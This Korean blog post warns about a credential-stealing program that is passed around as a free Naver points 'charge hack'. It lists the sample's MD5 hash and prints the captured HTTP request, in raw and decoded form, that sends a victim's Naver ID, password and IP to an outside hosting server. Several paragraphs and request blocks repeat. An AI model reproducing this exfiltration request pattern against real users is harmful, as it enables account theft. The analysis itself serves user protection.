728x90
반응형
국내 포털 사이트 네이버(Naver) 계정을 수집할 목적으로 제작된 악성코드가 발견되었으므로 인터넷 사용자들은 주의하시기 바랍니다.
해당 악성코드는 국내에서 제작된 것으로 추정되며, 네이버 포인트, 은화를 무료로 충전해주는 충전핵이라는 이름으로 배포가 이루어지고 있습니다.
하지만 실제 계정 정보를 입력한 상태에서 네이버 코인 충전을 시도할 경우 외부로 정보를 유출하는 행위를 하는 것을 확인할 수 있습니다.
위와 같은 방식으로 해당 충전핵 프로그램에서 네이버 계정을 입력한 사용자는 계정 정보를 도용 당하여 추가적인 악의적인 피해를 입을 수 있으므로, 외부에서 제작된 프로그램에 인터넷 사이트 계정 정보를 입력하는 행위를 절대로 하지 않도록 주의하시기 바랍니다.
특히 해당 프로그램은 일부 보안 제품에서 Packer를 통한 사전 진단(AVG : Win32/Themida)만 되는 수준이므로 주의가 요구됩니다.
해당 악성코드는 국내에서 제작된 것으로 추정되며, 네이버 포인트, 은화를 무료로 충전해주는 충전핵이라는 이름으로 배포가 이루어지고 있습니다.
MD5 : 490826bb44bed7023c9ef9519c598502
프로그램을 실행하면 네이버 코인 충전을 위해 네이버 계정 아이디와 비밀번호를 입력하도록 유도를 하고 있으며 비밀번호는 안전을 보장한다는 문구를 포함하고 있습니다.하지만 실제 계정 정보를 입력한 상태에서 네이버 코인 충전을 시도할 경우 외부로 정보를 유출하는 행위를 하는 것을 확인할 수 있습니다.
연결 방식은 파란(Paran) 호스팅 계정으로 UDP 연결을 시도하여 입력한 네이버 아이디, 비밀번호, 사용자 IP 주소를 네이버 특정 이메일로 전송을 하는 것을 확인하였습니다.
[211.45.156.97:2757 TCP 네트워크 연결 정보]
GET /ma.php?to=(프로그램 배포자 사용자 ID)@naver.com&from=(일부 생략)%40%6E%61%76%65%72%2E%63%6F%6D&title=%69%64%74%65%73%74&body=%70%61%73%73%74%65%73%74 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: wwwen.hosting.paran.com
Connection: Keep-Alive
[네트워크 연결 디코딩 정보]
GET /ma.php?to=(프로그램 배포자 사용자 ID)@naver.com&from=(프로그램 실행자 IP 주소)@naver.com&title=(프로그램 실행자 네이버 ID)&body=(프로그램 실행자 네이버 Password) HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: wwwen.hosting.paran.com
Connection: Keep-Alive
GET /ma.php?to=(프로그램 배포자 사용자 ID)@naver.com&from=(일부 생략)%40%6E%61%76%65%72%2E%63%6F%6D&title=%69%64%74%65%73%74&body=%70%61%73%73%74%65%73%74 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: wwwen.hosting.paran.com
Connection: Keep-Alive
[네트워크 연결 디코딩 정보]
GET /ma.php?to=(프로그램 배포자 사용자 ID)@naver.com&from=(프로그램 실행자 IP 주소)@naver.com&title=(프로그램 실행자 네이버 ID)&body=(프로그램 실행자 네이버 Password) HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: wwwen.hosting.paran.com
Connection: Keep-Alive
위와 같은 방식으로 해당 충전핵 프로그램에서 네이버 계정을 입력한 사용자는 계정 정보를 도용 당하여 추가적인 악의적인 피해를 입을 수 있으므로, 외부에서 제작된 프로그램에 인터넷 사이트 계정 정보를 입력하는 행위를 절대로 하지 않도록 주의하시기 바랍니다.
특히 해당 프로그램은 일부 보안 제품에서 Packer를 통한 사전 진단(AVG : Win32/Themida)만 되는 수준이므로 주의가 요구됩니다.
728x90
반응형